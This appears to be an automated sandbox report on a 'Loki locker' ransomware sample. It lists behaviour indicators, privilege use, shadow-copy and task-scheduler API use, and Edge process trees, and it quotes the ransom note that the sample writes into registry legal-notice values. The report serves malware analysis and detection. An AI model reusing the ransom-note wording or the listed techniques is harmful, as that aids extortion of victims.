taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process
5848 taskmgr.exe
5556 OpenWith.exe
4200 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 5436 7zG.exe Token: 35 5436 7zG.exe Token: SeSecurityPrivilege 5436 7zG.exe Token: SeSecurityPrivilege 5436 7zG.exe Token: SeDebugPrivilege 5848 taskmgr.exe Token: SeSystemProfilePrivilege 5848 taskmgr.exe Token: SeCreateGlobalPrivilege 5848 taskmgr.exe Token: SeDebugPrivilege 3984 sdiagnhost.exe Token: SeRestorePrivilege 4340 7zG.exe Token: 35 4340 7zG.exe Token: SeSecurityPrivilege 4340 7zG.exe Token: SeSecurityPrivilege 4340 7zG.exe Token: SeRestorePrivilege 5640 7zG.exe Token: 35 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeSecurityPrivilege 5640 7zG.exe Token: SeRestorePrivilege 2720 7zG.exe Token: 35 2720 7zG.exe Token: SeSecurityPrivilege 2720 7zG.exe Token: SeSecurityPrivilege 2720 7zG.exe Token: SeDebugPrivilege 3916 e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Token: SeSecurityPrivilege 5848 taskmgr.exe Token: SeTakeOwnershipPrivilege 5848 taskmgr.exe Token: SeDebugPrivilege 4024 winlogon.exe Token: SeDebugPrivilege 4920 winlogon.exe Token: SeIncreaseQuotaPrivilege 4496 WMIC.exe Token: SeSecurityPrivilege 4496 WMIC.exe Token: SeTakeOwnershipPrivilege 4496 WMIC.exe Token: SeLoadDriverPrivilege 4496 WMIC.exe Token: SeSystemProfilePrivilege 4496 WMIC.exe Token: SeSystemtimePrivilege 4496 WMIC.exe Token: SeProfSingleProcessPrivilege 4496 WMIC.exe Token: SeIncBasePriorityPrivilege 4496 WMIC.exe Token: SeCreatePagefilePrivilege 4496 WMIC.exe Token: SeBackupPrivilege 4496 WMIC.exe Token: SeRestorePrivilege 4496 WMIC.exe Token: SeShutdownPrivilege 4496 WMIC.exe Token: SeDebugPrivilege 4496 WMIC.exe Token: SeSystemEnvironmentPrivilege 4496 WMIC.exe Token: SeRemoteShutdownPrivilege 4496 WMIC.exe Token: SeUndockPrivilege 4496 WMIC.exe Token: SeManageVolumePrivilege 4496 WMIC.exe Token: 33 4496 WMIC.exe Token: 34 4496 WMIC.exe Token: 35 4496 WMIC.exe Token: 36 4496 WMIC.exe Token: SeIncreaseQuotaPrivilege 4496 WMIC.exe Token: SeSecurityPrivilege 4496 WMIC.exe Token: 
SeTakeOwnershipPrivilege 4496 WMIC.exe Token: SeLoadDriverPrivilege 4496 WMIC.exe Token: SeSystemProfilePrivilege 4496 WMIC.exe Token: SeSystemtimePrivilege 4496 WMIC.exe Token: SeProfSingleProcessPrivilege 4496 WMIC.exe Token: SeIncBasePriorityPrivilege 4496 WMIC.exe Token: SeCreatePagefilePrivilege 4496 WMIC.exe Token: SeBackupPrivilege 4496 WMIC.exe Token: SeRestorePrivilege 4496 WMIC.exe Token: SeShutdownPrivilege 4496 WMIC.exe Token: SeDebugPrivilege 4496 WMIC.exe Token: SeSystemEnvironmentPrivilege 4496 WMIC.exe Token: SeRemoteShutdownPrivilege 4496 WMIC.exe Token: SeUndockPrivilege 4496 WMIC.exe Token: SeManageVolumePrivilege 4496 WMIC.exe Token: 33 4496 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 3212 msedge.exe 5436 7zG.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 3856 msdt.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe 5848 taskmgr.exe -
Suspicious use of SetWindowsHookEx 62 IoCs
pid Process 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 5556 OpenWith.exe 3744 TextInputHost.exe 4456 StartMenuExperienceHost.exe 3744 TextInputHost.exe 632 StartMenuExperienceHost.exe 4828 SearchApp.exe 1544 TextInputHost.exe 1544 TextInputHost.exe 2684 StartMenuExperienceHost.exe 1000 SearchApp.exe 2412 TextInputHost.exe 2412 TextInputHost.exe 3708 StartMenuExperienceHost.exe 4272 SearchApp.exe 656 TextInputHost.exe 656 TextInputHost.exe 4560 StartMenuExperienceHost.exe 4044 SearchApp.exe 4192 firefox.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe 4200 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3212 wrote to memory of 5728 3212 msedge.exe 82 PID 3212 wrote to memory of 5728 3212 msedge.exe 82 PID 3212 wrote to memory of 3580 3212 msedge.exe 83 PID 3212 wrote to memory of 3580 3212 msedge.exe 83 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 2096 3212 msedge.exe 84 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85 PID 3212 wrote to memory of 4380 3212 msedge.exe 85
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: [email protected]\r\nWrite this ID in the title of your message: 9FF76E0A\r\nIn case of no answer in 24 hours write us to this e-mail: [email protected]" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3212
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffb3574f208,0x7ffb3574f214,0x7ffb3574f220
  PID:5728
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1860,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3
  PID:3580
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2
  PID:2096
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8
  PID:4380
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
  PID:3016
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1
  PID:1652
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5068,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:1
  PID:4952
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4692,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1
  PID:4572
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8
  PID:3732
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5476,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
  PID:3028
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
  PID:1624
  C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
  PID:6088
  C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8
  PID:4388
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8
  PID:2900
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8
  PID:4756
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6084,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8
  PID:3976
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:1
  PID:1624
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5540,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1
  PID:6088
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:8
  PID:3692
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=4904,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:1
  PID:4120
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
  PID:3268
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7084 /prefetch:8
  PID:5100
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8
  PID:2416
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:8
  PID:1256
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:8
  PID:2328
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3992,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:4852
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5260,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:1
  PID:2296
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:8
  PID:2068
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=896,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4856 /prefetch:8
  PID:2288
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3460,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8
  PID:1292
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2948,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1856 /prefetch:8
  PID:636
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:8
  PID:5088
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
